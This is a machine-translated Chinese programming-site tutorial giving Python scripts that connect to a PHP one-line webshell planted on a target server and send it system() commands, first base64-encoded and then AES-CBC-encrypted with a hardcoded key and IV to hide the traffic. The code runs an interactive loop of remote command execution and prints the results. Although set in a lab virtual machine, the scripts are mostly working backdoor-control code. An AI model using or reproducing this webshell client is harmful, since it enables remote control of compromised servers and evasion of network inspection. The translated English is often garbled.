程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
您现在的位置: 程式師世界 >> 編程語言 >  >> 更多編程語言 >> Python

Python connects the PHP Trojan horse and encrypts the transmitted data

編輯:Python

I have written two articles before , But not much .

Use python Connect JSP In a word, Trojans
Use burpsuite Yes python Of post Request for packet capture

I remember today , So integrate , Get another encryption .

base64

First of all Linux Write a in the virtual machine “ Two sentences ”.

Carry out a... On the parameter transfer base64 decode , This means that Windows This machine needs a base64 code .

import requests
import base64
url = str(input(' The goal is URL:')) # http://192.168.xxx.xxx/shell.php
pwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
# be used for burpsuite Grab the bag 
proxy = {

'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
while(True):
cmd = input(' Enter the command to execute :')
send = "system(\'" + cmd + "\');"
connect = base64.b64encode(send.encode('utf-8'))
# Pass the command to the one sentence Trojan horse 
payloads = {

pwd: connect
}
# To the goal url send out post request 
# response = requests.post(url, payloads)
response = requests.post(url, payloads, proxies=proxy)
# Echo the results of command execution 
print(response.text)

The results are as follows :



Decode it to see the command .

And then put the bag ,Python The code receives the returned data .

AES

Yes shell.php Make changes .

Python The code is as follows :

import requests
import base64
from Crypto.Cipher import AES
# secret key (key), Mies offset (iv) CBC Mode encryption 
BLOCK_SIZE = 16 # Bytes
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * \
chr(BLOCK_SIZE - len(s) % BLOCK_SIZE)
unpad = lambda s: s[:-ord(s[len(s) - 1:])]
key = '5c47c819bpt3apr0'
vi = '0102030405060708'
def AES_Encrypt(key, data):
data = pad(data)
# String complement 
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
encryptedbytes = cipher.encrypt(data.encode('utf8'))
# After encryption, you get bytes Data of type , Use Base64 Encoding , return byte character string 
encodestrs = base64.b64encode(encryptedbytes)
# Yes byte String press utf-8 decode 
enctext = encodestrs.decode('utf8')
return enctext
def AES_Decrypt(key, data):
data = data.encode('utf8')
encodebytes = base64.decodebytes(data)
# Convert encrypted data to bits bytes Type data 
cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, vi.encode('utf8'))
text_decrypted = cipher.decrypt(encodebytes)
# Go to make up for it 
text_decrypted = unpad(text_decrypted)
text_decrypted = text_decrypted.decode('utf8')
print(text_decrypted)
return text_decrypted
if __name__ == '__main__':
url = str(input(' The goal is URL:')) # http://192.168.223.xxx.xxx/shell.php
pwd = str(input(' Connect the password :')) # In fact, it is a variable in the Trojan horse shell
# be used for burpsuite Grab the bag 
proxy = {

'http': '127.0.0.1:8080',
'https': '127.0.0.1:8080'
}
while(True):
cmd = input(' Enter the command to execute :')
send = "system(\'" + cmd + "\');"
# Pass the command to the one sentence Trojan horse 
payloads = {

pwd: AES_Encrypt(key, send)
}
# To the goal url send out post request 
# response = requests.post(url, payloads)
response = requests.post(url, payloads, proxies=proxy)
# Echo the results of command execution 
print(response.text)

The code of these encryption and decryption algorithms , It is easy to find on the Internet .

You can also modify it yourself

Results obtained after capturing packets :

AES Module installation

python stay Windows Next use AES when , To install pycryptodome modular

pip install pycryptodome

python stay Linux Next use AES when , To install pycrypto modular

pip install pycrypto

  1. 上一篇文章:
  2. 下一篇文章:
Copyright © 程式師世界 All Rights Reserved